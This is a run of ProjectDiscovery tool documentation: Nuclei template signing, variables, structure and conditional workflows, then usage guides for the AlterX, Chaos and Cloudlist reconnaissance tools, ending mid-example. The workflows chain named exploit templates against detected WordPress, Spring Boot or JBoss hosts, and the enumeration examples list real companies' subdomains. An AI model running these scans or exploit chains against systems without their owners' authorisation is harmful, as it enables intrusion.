Review details on template signing for Nuclei
Template signing via the private-public key mechanism is a crucial aspect of ensuring the integrity, authenticity, and security of templates. This mechanism involves the use of asymmetric cryptography, specifically the Elliptic Curve Digital Signature Algorithm (ECDSA), to create a secure and verifiable signature.
In this process, a template author generates a private key that remains confidential and securely stored. The corresponding public key is then shared with the template consumers. When a template is created or modified, the author signs it using their private key, generating a unique signature that is attached to the template.
Template consumers can verify the authenticity and integrity of a signed template by using the author's public key. By applying the appropriate cryptographic algorithm (ECDSA), they can validate the signature and ensure that the template has not been tampered with since it was signed. This provides a level of trust, as any modifications or unauthorized changes to the template would result in a failed verification process.
By employing the private-public key mechanism, template signing adds an additional layer of security and trust to the template ecosystem. It helps establish the identity of the template author and ensures that the templates used in various systems are genuine and have not been altered maliciously.
**What does signing a template mean?**
Template signing is a mechanism to ensure the integrity and authenticity of templates. The primary goal is to provide template writers and consumers a way to trust crowdsourced or custom templates ensuring that they are not tampered with.
All [official Nuclei templates](https://github.com/projectdiscovery/nuclei-templates) include a digital signature and are verified by Nuclei while loading templates using ProjectDiscovery's public key (shipped with the Nuclei binary).
Individuals or organizations running Nuclei in their work environment can generate their own key-pair with `nuclei` and sign their custom templates with their private key, thus ensuring that only authorized templates are being used in their environment.
This also allows entities to fully utilize the power of new protocols like `code` without worrying about malicious custom templates being used in their environment.
**NOTE:**
* **Template signing is optional for all protocols except `code`.**
* **Unsigned code templates are disabled and cannot be executed using Nuclei.**
* **Only code templates signed by the author (yourself) or ProjectDiscovery can be executed.**
* **Template signing was primarily introduced to ensure the security of templates that run code on the host machine.**
* Code file references (for example: `source: protocols/code/pyfile.py`) are allowed, and the content of these files is included in the template digest.
* Payload file references (for example: `payloads: protocols/http/params.txt`) are not included in the template digest, since they are treated as payloads/helpers and not actual code that is executed.
* Template signing is deterministic for both signing and verifying: if a code file referenced in a template lives outside the templates directory and is loaded with the `-lfa` (local file access) flag, verification will fail when the same template is used without `-lfa`.
### Signing Custom Template
The simplest and recommended way to generate a key-pair and sign/verify templates is to use `nuclei` itself.
When signing a template, if a key-pair does not exist, Nuclei will prompt the user to generate a new one.
```console
$ ./nuclei -t templates.yaml -sign
[INF] Generating new key-pair for signing templates
[*] Enter User/Organization Name (exit to abort) : acme
[*] Enter passphrase (exit to abort):
[*] Enter same passphrase again:
[INF] Successfully generated new key-pair for signing templates
```
> **Note:** The passphrase is optional and can be left blank. When provided, the private key is encrypted with the passphrase using the PEMCipherAES256 algorithm.
Once a key-pair is generated, you can sign any custom template using `-sign` flag as shown below.
```console
$ ./nuclei -t templates.yaml -sign
[INF] All templates signatures were elaborated success=1 failed=0
```
> **Note:** Every time you make any change in your code template, you need to re-sign it to run with Nuclei.
### Template Digest and Signing Keys
When a template is signed, a digest is generated and added to the template. This digest is a hash of the template content and is used to verify the integrity of the template. If the template is modified after signing, the digest will change, and the signature verification will fail during template loading.
```yaml
# digest: 4a0a00473045022100eb01da6b97893e7868c584f330a0cd52df9bddac005860bb8595ba5b8aed58c9022050043feac68d69045cf320cba9298a2eb2e792ea4720d045d01e803de1943e7d:4a3eb6b4988d95847d4203be25ed1d46
```
The digest is in the format `signature:fragment`, where the signature is the digital signature of the template used to verify its integrity, and the fragment is metadata generated by MD5-hashing the public key, used to prevent re-signing of code templates not written by you.
The key-pair generated by Nuclei is stored in two files in the `$CONFIG/nuclei/keys` directory, where `$CONFIG` is the system-specific config directory. The private key is stored in `nuclei-user-private-key.pem`, which is encrypted with a passphrase if provided. The public key is stored in `nuclei-user.crt`, which includes the public key and an identifier (e.g., user/org name) in a self-signed certificate.
```bash
$ ls -la ~/.config/nuclei/keys
total 16
-rw------- 1 tarun staff 251B Oct 4 21:45 nuclei-user-private-key.pem # encrypted private key with passphrase
-rw------- 1 tarun staff 572B Oct 4 21:45 nuclei-user.crt # self signed certificate which includes public key and identifier (i.e user/org name)
```
To use the public key for verification, you can either copy it to the `$CONFIG/nuclei/keys` directory on another user's machine, or set the `NUCLEI_USER_CERTIFICATE` environment variable to the path or content of the public key.
To use the private key, you can copy it to the `$CONFIG/nuclei/keys` directory on another user's machine, or set the `NUCLEI_USER_PRIVATE_KEY` environment variable to the path or content of the private key.
```console
$ export NUCLEI_USER_CERTIFICATE=$(cat path/to/nuclei-user.crt)
$ export NUCLEI_USER_PRIVATE_KEY=$(cat path/to/nuclei-user-private-key.pem)
```
It's important to note that you are responsible for securing and managing the private key, and Nuclei has no accountability for any loss of the private key.
By default, Nuclei loads the user certificate (public key) from the default locations mentioned above and uses it to verify templates. When running, Nuclei will execute signed templates, warn when executing unsigned custom templates, and block unsigned code templates. You can disable this warning by setting the `HIDE_TEMPLATE_SIG_WARNING` environment variable to `true`.
## FAQ
**Found X unsigned or tampered code template?**
```bash
./nuclei -u scanme.sh -t simple-code.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.0-dev
projectdiscovery.io
[WRN] Found 1 unsigned or tampered code template (carefully examine before using it & use -sign flag to sign them)
[INF] Current nuclei version: v3.0.0-dev (development)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] No results found. Better luck next time!
[FTL] Could not run nuclei: no templates provided for scan
```
Here, `simple-code.yaml` is a code protocol template that is either not signed or whose content has been modified after signing, which indicates a loss of template integrity.
If you are the template writer, you can go ahead and sign the template using the `-sign` flag; if you are a template consumer, you should carefully examine the template before signing it.
**Re-signing code templates are not allowed for security reasons?**
```bash
nuclei -u scanme.sh -t simple-code.yaml -sign
[ERR] could not sign 'simple-code.yaml': [signer:RUNTIME] re-signing code templates are not allowed for security reasons.
[INF] All templates signatures were elaborated success=0 failed=1
```
The error message `re-signing code templates are not allowed for security reasons` comes from the Nuclei engine. It indicates that the code template was initially signed by another user and someone else is now trying to re-sign it.
This measure was implemented to prevent running untrusted templates unknowingly, which might lead to potential security issues.
When you encounter this error, you are dealing with a template that has been signed by another user; likely, the original signer is not you or the ProjectDiscovery team.
By default, Nuclei disallows executing code templates that are signed by anyone other than you or from the public templates provided by projectdiscovery/nuclei-templates.
This is done to prevent potential security abuse using code templates.
To resolve this error:
1. Open and thoroughly examine the code template for any modifications.
2. Manually remove the existing digest signature from the template.
3. Sign the template again.
This way, you can ensure that only templates verified and trusted by you (or projectdiscovery) are run, thus maintaining a secure environment.
# Variables
Review details on variables for Nuclei
Variables can be used to declare some values which remain constant throughout the template. The value of the variable once calculated does not change. Variables can be either simple strings or DSL helper functions. If the variable is a helper function, it is enclosed in double-curly brackets `{{}}`. Variables are declared at template level.
Example variables -
```yaml
variables:
a1: "test" # A string variable
a2: "{{to_lower(rand_base(5))}}" # A DSL function variable
```
Currently, `dns`, `http`, `headless` and `network` protocols support variables.
Example of templates with variables -
```yaml
# Variable example using HTTP requests
id: variables-example
info:
name: Variables Example
author: pdteam
severity: info
variables:
a1: "value"
a2: "{{base64('hello')}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{FQDN}}
Test: {{a1}}
Another: {{a2}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "value"
- "aGVsbG8="
```
```yaml
# Variable example for network requests
id: variables-example
info:
name: Variables Example
author: pdteam
severity: info
variables:
a1: "PING"
a2: "{{base64('hello')}}"
tcp:
- host:
- "{{Hostname}}"
inputs:
- data: "{{a1}}"
read-size: 8
matchers:
- type: word
part: data
words:
- "{{a2}}"
```
# Nuclei Template Structure
Learn the common elements required to create a Nuclei Template
# Template Structure
Nuclei Templates use a custom YAML-based DSL, with their structure varying according to the specific protocol employed. Typically, a template comprises the following elements:
* A [unique ID](#id) for the template
* Essential [information](#information) and [metadata](#metadata) relevant to the template
* The designated protocol, such as [HTTP](/templates/protocols/http/basic-http), [DNS](/templates/protocols/dns), [File](/templates/protocols/file), etc.
* Details specific to the chosen protocol, like the requests made in the HTTP protocol
* A series of [matchers](/templates/reference/matchers) to ascertain the presence of findings
* Necessary [extractors](/templates/reference/extractors) for data retrieval from the results
For a detailed, automatically generated overview of everything available in the nuclei template syntax, you can visit the [syntax reference](https://github.com/projectdiscovery/nuclei/blob/dev/SYNTAX-REFERENCE.md) on GitHub.
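Putting these elements together, a minimal HTTP template skeleton (the id, path, and matcher word are illustrative) looks like this:
```yaml
id: example-template                # unique template ID
info:                               # essential information and metadata
  name: Example Template
  author: you
  severity: info
  tags: example
http:                               # protocol-specific request details
  - method: GET
    path:
      - "{{BaseURL}}/example"
    matchers:                       # matchers ascertain the presence of findings
      - type: word
        words:
          - "example"
```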
## ID
Each template has a unique ID which is used during output writing to specify the template name for an output line.
Template files use the **YAML** extension and can be created in any text editor of your choice.
```yaml
id: git-config
```
ID must not contain spaces. This is done to allow easier output parsing.
## Information
The next important piece of a template is the **info** block. The info block provides **name**, **author**, **severity**, **description**, **reference**, **tags** and `metadata`. The **severity** field indicates the severity of the issue the template detects. The info block also supports dynamic fields, so you can define any number of `key: value` pairs to provide more useful information about the template. **reference** is another popular field, used to define external reference links for the template.
Another useful field to always add in the `info` block is **tags**. It lets you assign custom tags to a template depending on its purpose, like `cve`, `rce`, etc. This allows Nuclei to identify templates matching your input tags and run only those.
Example of an info block -
```yaml
info:
name: Git Config File Detection Template
author: Ice3man
severity: medium
description: Searches for the pattern /.git/config on passed URLs.
reference: https://www.acunetix.com/vulnerabilities/web/git-repository-found/
tags: git,config
```
Actual requests and corresponding matchers are placed below the info block; they perform the task of making requests to target servers and determining whether the template request was successful.
Each template file can contain multiple requests to be made. The template is iterated and one by one the desired requests are made to the target sites.
The best part is that you can simply share your crafted template with teammates or a triage/security team so they can replicate the issue on their side with ease.
## Metadata
It's possible to add metadata nodes, for example, to integrate with [uncover](https://github.com/projectdiscovery/uncover) (cf. [Uncover Integration](https://docs.projectdiscovery.io/tools/nuclei/running#scan-on-internet-database)).
The metadata nodes are crafted this way: `<engine>-query: '<query>'` where:
* `<engine>` is the search engine, equivalent to the value of the `-ue` option of nuclei or the `-e` option of uncover
* `<query>` is the search query, equivalent to the value of the `-uq` option of nuclei or the `-q` option of uncover
For example for Shodan:
```yaml
info:
metadata:
shodan-query: 'vuln:CVE-2021-26855'
```
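Multiple engines can be listed side by side in the same `metadata` block. A short sketch (the FOFA query shown is illustrative):
```yaml
info:
  metadata:
    shodan-query: 'vuln:CVE-2021-26855'
    fofa-query: 'app="Microsoft-Exchange"'
```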
# Workflow Examples
Review some template workflow examples for Nuclei
## Generic workflows
A generic workflow that runs two templates, one to detect Jira and another to detect Confluence.
```yaml
id: workflow-example
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/jira-detect.yaml
- template: technologies/confluence-detect.yaml
```
## Basic conditional workflows
A condition-based workflow, which first tries to detect whether Spring Boot is running on a target. If Spring Boot is found, a list of exploits is executed against it.
```yaml
id: springboot-workflow
info:
name: Springboot Security Checks
author: dwisiswant0
workflows:
- template: security-misconfiguration/springboot-detect.yaml
subtemplates:
- template: cves/CVE-2018-1271.yaml
- template: cves/CVE-2020-5410.yaml
- template: vulnerabilities/springboot-actuators-jolokia-xxe.yaml
- template: vulnerabilities/springboot-h2-db-rce.yaml
```
## Multi condition workflows
This template demonstrates nested workflows with Nuclei, where there are multiple levels of template chaining.
```yaml
id: springboot-workflow
info:
name: Springboot Security Checks
author: dwisiswant0
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: lotus-domino
subtemplates:
- template: technologies/lotus-domino-version.yaml
subtemplates:
- template: cves/xx-yy-zz.yaml
subtemplates:
- template: cves/xx-xx-xx.yaml
```
## Conditional workflows with matcher
This template detects whether WordPress is running on an input host; if it is found, a set of targeted exploits and CVE checks is executed against it.
```yaml
id: workflow-example
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: wordpress
subtemplates:
- template: cves/CVE-2019-6715.yaml
- template: cves/CVE-2019-9978.yaml
- template: files/wordpress-db-backup.yaml
- template: files/wordpress-debug-log.yaml
- template: files/wordpress-directory-listing.yaml
- template: files/wordpress-emergency-script.yaml
- template: files/wordpress-installer-log.yaml
- template: files/wordpress-tmm-db-migrate.yaml
- template: files/wordpress-user-enumeration.yaml
- template: security-misconfiguration/wordpress-accessible-wpconfig.yaml
- template: vulnerabilities/sassy-social-share.yaml
- template: vulnerabilities/w3c-total-cache-ssrf.yaml
- template: vulnerabilities/wordpress-duplicator-path-traversal.yaml
- template: vulnerabilities/wordpress-social-metrics-tracker.yaml
- template: vulnerabilities/wordpress-wordfence-xss.yaml
- template: vulnerabilities/wordpress-wpcourses-info-disclosure.yaml
```
## Multiple Matcher workflow
Very similar to the last example, with multiple matcher names.
```yaml
id: workflow-multiple-matcher
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: vbulletin
subtemplates:
- tags: vbulletin
- name: jboss
subtemplates:
- tags: jboss
```
# Template Workflows Overview
Learn about template workflows in Nuclei
Workflows enable users to orchestrate a series of actions by setting a defined execution order for various templates. These templates are activated upon predetermined conditions, establishing a streamlined method to leverage the capabilities of nuclei tailored to the user's specific requirements. Consequently, you can craft workflows that are contingent on particular technologies or targets—such as those exclusive to WordPress or Jira—triggering these sequences only when the relevant technology is identified.
Within a workflow, all templates share a unified execution environment, which means that any named extractor from one template can be seamlessly accessed in another by simply referencing its designated name.
For those with prior knowledge of the technology stack in use, we advise constructing personalized workflows for your scans. This strategic approach not only substantially reduces the duration of scans but also enhances the quality and precision of the outcomes.
Workflows are defined with the `workflows` attribute, followed by the `template` / `subtemplates` and `tags` to execute.
```yaml
workflows:
- template: http/technologies/template-to-execute.yaml
```
**Type of workflows**
1. [Generic workflows](#generic-workflows)
2. [Conditional workflows](#conditional-workflows)
## Generic Workflows
In a generic workflow, one can define one or more templates to be executed from a single workflow file. Both files and directories are supported as input.
A workflow that runs all config-related templates on the list of given URLs.
```yaml
workflows:
- template: http/exposures/configs/git-config.yaml
- template: http/exposures/configs/exposed-svn.yaml
- template: http/vulnerabilities/generic/generic-env.yaml
- template: http/exposures/backups/zip-backup-files.yaml
- tags: xss,ssrf,cve,lfi
```
A workflow that runs a specific list of checks defined for your project.
```yaml
workflows:
- template: http/cves/
- template: http/exposures/
- tags: exposures
```
## Conditional Workflows
You can also create conditional templates that execute after matching the condition of a previous template. This is mostly useful for vulnerability detection and exploitation, as well as tech-based detection and exploitation. Use cases for this kind of workflow are vast and varied.
**Templates based condition check**
A workflow that executes subtemplates when the base template matches.
```yaml
workflows:
- template: http/technologies/jira-detect.yaml
subtemplates:
- tags: jira
- template: exploits/jira/
```
**Matcher Name based condition check**
A workflow that executes subtemplates when a named matcher of the base template is found in the result.
```yaml
workflows:
- template: http/technologies/tech-detect.yaml
matchers:
- name: vbulletin
subtemplates:
- template: exploits/vbulletin-exp1.yaml
- template: exploits/vbulletin-exp2.yaml
- name: jboss
subtemplates:
- template: exploits/jboss-exp1.yaml
- template: exploits/jboss-exp2.yaml
```
In a similar manner, one can create as many checks, nested as deeply as needed.
**Subtemplate and matcher name based multi level conditional check**
A workflow showcasing a chain of template executions, each running only if the previous template matched.
```yaml
workflows:
- template: http/technologies/tech-detect.yaml
matchers:
- name: lotus-domino
subtemplates:
- template: http/technologies/lotus-domino-version.yaml
subtemplates:
- template: http/cves/2020/xx-yy-zz.yaml
subtemplates:
- template: http/cves/2020/xx-xx-xx.yaml
```
Conditional workflows are a great example of performing checks and vulnerability detection in the most efficient manner, instead of spraying all templates on all targets. They generally offer a good return on your time and are gentler on the targets as well.
## Shared Execution Context
The Nuclei engine supports a transparent workflow cookie jar and key-value sharing across templates that are part of the same workflow. Here follows an example of a workflow that extracts a value from the first template and uses it in the second, conditional one:
```yaml
id: key-value-sharing-example
info:
name: Key Value Sharing Example
author: pdteam
severity: info
workflows:
- template: template-with-named-extractor.yaml
subtemplates:
- template: template-using-named-extractor.yaml
```
For example, the following template extracts `href` links from a target web page body and makes the value available under the `extracted` key:
```yaml
# template-with-named-extractor.yaml
id: value-sharing-template1
info:
name: value-sharing-template1
author: pdteam
severity: info
http:
- path:
- "{{BaseURL}}/path1"
extractors:
- type: regex
part: body
name: extracted
regex:
- 'href="(.*)"'
group: 1
```
Finally, the second template in the workflow uses the obtained value by referencing the extractor name (`extracted`):
```yaml
# template-using-named-extractor.yaml
id: value-sharing-template2
info:
name: value-sharing-template2
author: pdteam
severity: info
http:
- raw:
- |
GET /path2 HTTP/1.1
Host: {{Hostname}}
{{extracted}}
```
# AlterX Install
Learn how to install AlterX and get started
Enter the command below in a terminal to install AlterX using Go.
```bash
go install github.com/projectdiscovery/alterx/cmd/alterx@latest
```
## Installation Notes
* AlterX requires the latest version of [**Go**](https://go.dev/doc/install)
# AlterX Overview
A fast and customizable subdomain wordlist generator
**AlterX** is a high-performance, customizable subdomain wordlist generator. It fits into common subdomain enumeration pipelines by using customizable patterns, not hardcoded ones.
For more details, check out [our blog introducing AlterX](https://blog.projectdiscovery.io/introducing-alterx-simplifying-active-subdomain-enumeration-with-patterns/) or view the [GitHub repo](https://github.com/projectdiscovery/alterx).
## Features
* **Fast and Customizable**: Generate subdomain wordlists tailored to your needs.
* **Automatic Word Enrichment**: Built-in enrichment to expand results.
* **Pre-defined Variables**: Use variables to simplify your patterns.
* **Configurable Patterns**: Modify patterns to match specific enumeration pipelines.
* **STDIN / List Input**: Accepts standard input and list files for easy integration.
## Support
Need help with **AlterX**? Whether it’s installation issues or feedback on a cool use case, we want to hear from you.
* Visit the [Help](/help) section for docs.
## Join the Community
If you have questions or want to discuss ProjectDiscovery with other developers, join us on [Discord](https://discord.com/invite/projectdiscovery).
# Running AlterX
Learn about running AlterX with details on variables and examples
## Basic Usage
For a detailed overview of **AlterX** options, visit the [Usage](/tools/alterx/usage) page.
If you have questions, feel free to reach out through our [Help](/help) page.
## Why AlterX?
What differentiates `alterx` from other subdomain permutation tools like `goaltdns` is its **scripting** feature. AlterX accepts patterns as input and generates subdomain permutation wordlists based on these patterns—similar to how [Nuclei](https://github.com/projectdiscovery/nuclei) works with [fuzzing-templates](https://github.com/projectdiscovery/fuzzing-templates).
Active subdomain enumeration is challenging because its success depends on the probability that the generated candidates actually exist. On a scale from least to most effective, the process can be visualized as:
```console
Using Wordlist < generate permutations with subdomains (goaltdns) < alterx
```
Most subdomain permutation tools rely on hardcoded patterns, generating massive wordlists that may contain millions of subdomains—making bruteforcing with tools like `dnsx` infeasible. With `alterx`, you can create patterns based on results from passive subdomain enumeration, significantly increasing the chances of finding valid subdomains and making brute-forcing more efficient.
## Variables
`alterx` uses a variable-like syntax similar to nuclei-templates. You can create custom patterns using these variables. When domains are passed as input, `alterx` evaluates the input and extracts variables from it.
### Basic Variables
```yaml
{{sub}} : subdomain prefix or left most part of a subdomain
{{suffix}} : everything except {{sub}} in subdomain name is suffix
{{tld}} : top level domain name (ex com,uk,in etc)
{{etld}} : also known as public suffix (ex co.uk , gov.in etc)
```
| Variable | api.scanme.sh | admin.dev.scanme.sh | cloud.scanme.co.uk |
| ------------ | ------------- | ------------------- | ------------------ |
| `{{sub}}` | `api` | `admin` | `cloud` |
| `{{suffix}}` | `scanme.sh` | `dev.scanme.sh` | `scanme.co.uk` |
| `{{tld}}` | `sh` | `sh` | `uk` |
| `{{etld}}` | `-` | `-` | `co.uk` |
### Advanced Variables
```yaml
{{root}} : also known as eTLD+1 i.e only root domain (ex for api.scanme.sh => {{root}} is scanme.sh)
{{subN}} : where N is an integer (ex {{sub1}} , {{sub2}} etc)
// {{subN}} is an advanced variable which exists depending on input
// let's say there is a multi-level domain cloud.nuclei.scanme.sh
// in this case {{sub}} = cloud and {{sub1}} = nuclei
```
| Variable | api.scanme.sh | admin.dev.scanme.sh | cloud.scanme.co.uk |
| ---------- | ------------- | ------------------- | ------------------ |
| `{{root}}` | `scanme.sh` | `scanme.sh` | `scanme.co.uk` |
| `{{sub1}}` | `-` | `dev` | `-` |
| `{{sub2}}` | `-` | `-` | `-` |
## Patterns
In simple terms, a pattern is a `template` that describes what type of permutations AlterX should generate.
```console
// Below are some example patterns which can be used to generate permutations
// assuming api.scanme.sh was given as input and the variable {{word}} has a single value: prod
// alterx generates subdomains for the patterns below
"{{sub}}-{{word}}.{{suffix}}" // ex: api-prod.scanme.sh
"{{word}}-{{sub}}.{{suffix}}" // ex: prod-api.scanme.sh
"{{word}}.{{sub}}.{{suffix}}" // ex: prod.api.scanme.sh
"{{sub}}.{{word}}.{{suffix}}" // ex: api.prod.scanme.sh
```
You can find an example of a pattern configuration file [here](https://github.com/projectdiscovery/alterx/blob/main/permutations.yaml). This file is customizable based on your security assessments or penetration test requirements.
This configuration file generates subdomain permutations for security assessments or penetration tests using customizable patterns and dynamic payloads. Patterns include dash-based, dot-based, and others. Users can create custom payload sections, such as words, region identifiers, or numbers, to suit their specific needs.
For example, a user could define a new payload section `env` with values like `prod` and `dev`, then use it in patterns like `{{env}}-{{word}}.{{suffix}}` to generate subdomains like `prod-app.example.com` and `dev-api.example.com`. This flexibility allows tailored subdomain lists for unique testing scenarios and target environments, as sketched below.
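A minimal sketch of such a custom config, assuming the `patterns`/`payloads` layout used by the default permutations file:
```yaml
patterns:
  - "{{env}}-{{word}}.{{suffix}}"   # custom pattern using the new payload section
payloads:
  env:
    - prod
    - dev
  word:
    - app
    - api
```
Given `example.com` as input, this would generate candidates such as `prod-app.example.com` and `dev-api.example.com`.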
The default pattern config file used for generation is stored in the `$HOME/.config/alterx/` directory, and a custom config file can be supplied with the `-ac` option.
## Examples
An example of running alterx on an existing list of passive subdomains of `tesla.com` yields **10 additional new and valid subdomains**, resolved using [dnsx](https://github.com/projectdiscovery/dnsx).
```console
$ chaos -d tesla.com | alterx | dnsx
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 8312 permutations in 0.0740s
auth-global-stage.tesla.com
auth-stage.tesla.com
digitalassets-stage.tesla.com
errlog-stage.tesla.com
kronos-dev.tesla.com
mfa-stage.tesla.com
paymentrecon-stage.tesla.com
sso-dev.tesla.com
shop-stage.tesla.com
www-uat-dev.tesla.com
```
Similarly, the `-enrich` option can be used to feed known subdomains in as word input to generate **target-aware permutations**.
```console
$ chaos -d tesla.com | alterx -enrich
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 662010 permutations in 3.9989s
```
You can alter the default patterns at runtime using the `-pattern` CLI option.
```console
$ chaos -d tesla.com | alterx -enrich -p '{{word}}-{{suffix}}'
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 21523 permutations in 0.7984s
```
You can also overwrite existing variable values using the `-payload` (`-pp`) CLI option.
```console
$ alterx -list tesla.txt -enrich -p '{{word}}-{{year}}.{{suffix}}' -pp word=keywords.txt -pp year=2023
___ ____ _ __
/ _ | / / /____ ____| |/_/
/ __ |/ / __/ -_) __/> <
/_/ |_/_/\__/\__/_/ /_/|_|
projectdiscovery.io
[INF] Generated 21419 permutations in 1.1699s
```
For more information, check out the release **[blog](https://blog.projectdiscovery.io/introducing-alterx-simplifying-active-subdomain-enumeration-with-patterns/)**
Explore other subdomain permutation tools that might integrate well with your workflow:
* [altdns](https://github.com/infosec-au/altdns)
* [goaltdns](https://github.com/subfinder/goaltdns)
* [gotator](https://github.com/Josue87/gotator)
* [ripgen](https://github.com/resyncgg/ripgen/)
* [dnsgen](https://github.com/ProjectAnte/dnsgen)
* [dmut](https://github.com/bp0lr/dmut)
* [permdns](https://github.com/hpy/permDNS)
* [str-replace](https://github.com/j3ssie/str-replace)
* [dnscewl](https://github.com/codingo/DNSCewl)
* [regulator](https://github.com/cramppet/regulator)
# AlterX Usage
Learn AlterX usage including flags and filters
## Access help
Use `alterx -h` to display all of the help options.
## AlterX options
You can use the following command to see the available flags and options:
```console
Fast and customizable subdomain wordlist generator using DSL.
Usage:
./alterx [flags]
Flags:
INPUT:
-l, -list string[] subdomains to use when creating permutations (stdin, comma-separated, file)
-p, -pattern string[] custom permutation patterns input to generate (comma-seperated, file)
-pp, -payload value custom payload pattern input to replace/use in key=value format (-pp 'word=words.txt')
OUTPUT:
-es, -estimate estimate permutation count without generating payloads
-o, -output string output file to write altered subdomain list
-ms, -max-size int Max export data size (kb, mb, gb, tb) (default mb)
-v, -verbose display verbose output
-silent display results only
-version display alterx version
CONFIG:
-config string alterx cli config file (default '$HOME/.config/alterx/config.yaml')
-en, -enrich enrich wordlist by extracting words from input
-ac string alterx permutation config file (default '$HOME/.config/alterx/permutation_v0.0.1.yaml')
-limit int limit the number of results to return (default 0)
UPDATE:
-up, -update update alterx to latest version
-duc, -disable-update-check disable automatic alterx update check
```
# Chaos Install
Learn how to install Chaos and get started
Enter the command below in a terminal to install ProjectDiscovery's Chaos Client using Go.
```bash
go install -v github.com/projectdiscovery/chaos-client/cmd/chaos@latest
```
## Installation Notes
* Chaos requires the latest version of [**Go**](https://go.dev/doc/install)
# Chaos Overview
A Go Client to communicate with the Chaos API
Chaos is a comprehensive API dataset of DNS entries across the internet. Maintained by ProjectDiscovery, Chaos is actively updated and contains thousands of records.
Check out [our blog introducing Chaos](https://blog.projectdiscovery.io/introducing-chaos-bug-bounty-recon-data-api/), and learn more on the [Chaos website](https://chaos.projectdiscovery.io/).
## Support
Questions about using Chaos? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Chaos
Learn about running Chaos with details and an example
For all of the flags and options available for **Chaos** be sure to check out the [Usage](/tools/chaos/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
In order to get subdomains for a domain, use the following command.
```bash
chaos -d uber.com -silent
restaurants.uber.com
testcdn.uber.com
approvalservice.uber.com
zoom-logs.uber.com
eastwood.uber.com
meh.uber.com
webview.uber.com
kiosk-api.uber.com
utmbeta-staging.uber.com
getmatched-staging.uber.com
logs.uber.com
dca1.cfe.uber.com
cn-staging.uber.com
frontends-primary.uber.com
eng.uber.com
guest.uber.com
kiosk-home-staging.uber.com
```
## API Key
You can get your API key by either signing up or logging in at [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io?ref=api_key).
## API Key Environment variable
You can also set the API key as an environment variable in your bash profile.
```bash
export CHAOS_KEY=CHAOS_API_KEY
```
## Notes
* The API is rate-limited to 60 requests / min / IP
* The Chaos API **only** supports querying by domain name.
# Chaos Usage
Learn Chaos usage including flags and filters
## Access help
Use `chaos -h` to display all of the help options.
## Chaos options
| Flag | Description | Example |
| ----------------------- | ---------------------------------------- | ------------------------------- |
| `-d` | Domain to find subdomains for | `chaos -d uber.com` |
| `-count` | Show statistics for the specified domain | `chaos -d uber.com -count` |
| `-o` | File to write output to (optional) | `chaos -d uber.com -o uber.txt` |
| `-json` | Print output as json | `chaos -d uber.com -json` |
| `-key` | Chaos key for API | `chaos -key API_KEY` |
| `-dL` | File with list of domains (optional) | `chaos -dL domains.txt` |
| `-silent` | Make the output silent | `chaos -d uber.com -silent` |
| `-version` | Print current version of chaos client | `chaos -version` |
| `-verbose` | Show verbose output | `chaos -verbose` |
| `-update` | updates to latest version | `chaos -up` |
| `-disable-update-check` | disables automatic update check | `chaos -duc` |
# Cloudlist Install
Learn how to install Cloudlist and get started
Enter the command below in a terminal to install ProjectDiscovery's Cloudlist using Go.
```bash
go install -v github.com/projectdiscovery/cloudlist/cmd/cloudlist@latest
```
Alternatively, download a prebuilt binary from the [releases page](https://github.com/projectdiscovery/cloudlist/releases/):
* Download the latest binary for your OS.
* Unzip the ready-to-run binary.
## Installation Notes
* Cloudlist requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On macOS or Linux, run the following in your terminal:
```bash
echo 'export PATH=$PATH:$HOME/go/bin' >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/cloudlist`
# Cloudlist Overview
A multi-cloud tool to identify assets across cloud service providers
Cloudlist is a multi-cloud tool for getting assets from cloud providers. It is designed for blue teams to augment attack surface management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration effort.
## Features
* List Cloud assets with multiple configurations
* Multiple Cloud providers support
* Multiple output format support
* Multiple filters support
* Highly extensible making adding new providers a breeze
* **stdout** support to work with other tools in pipelines
## Support
Questions about using Cloudlist? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Cloudlist Providers
Supported cloud providers
This guide offers insights into each supported provider, enabling you to leverage Cloudlist's capabilities to their fullest extent for comprehensive asset visibility and control.
## Major Cloud Providers
### AWS (Amazon Web Services)
Supported AWS Services:
* [EC2](https://aws.amazon.com/ec2/)
* [Route53](https://aws.amazon.com/route53/)
* [S3](https://aws.amazon.com/s3/)
* [Cloudfront](https://aws.amazon.com/cloudfront/)
* [ECS](https://aws.amazon.com/ecs/)
* [EKS](https://aws.amazon.com/eks/)
* [ELB](https://aws.amazon.com/elasticloadbalancing/)
* [ELBv2](https://aws.amazon.com/elasticloadbalancing/)
* [Lambda](https://aws.amazon.com/lambda/)
* [Lightsail](https://aws.amazon.com/lightsail/)
* [Apigateway](https://aws.amazon.com/api-gateway/)
**Example Config**:
Amazon Web Services can be integrated by using the following configuration block.
```yaml
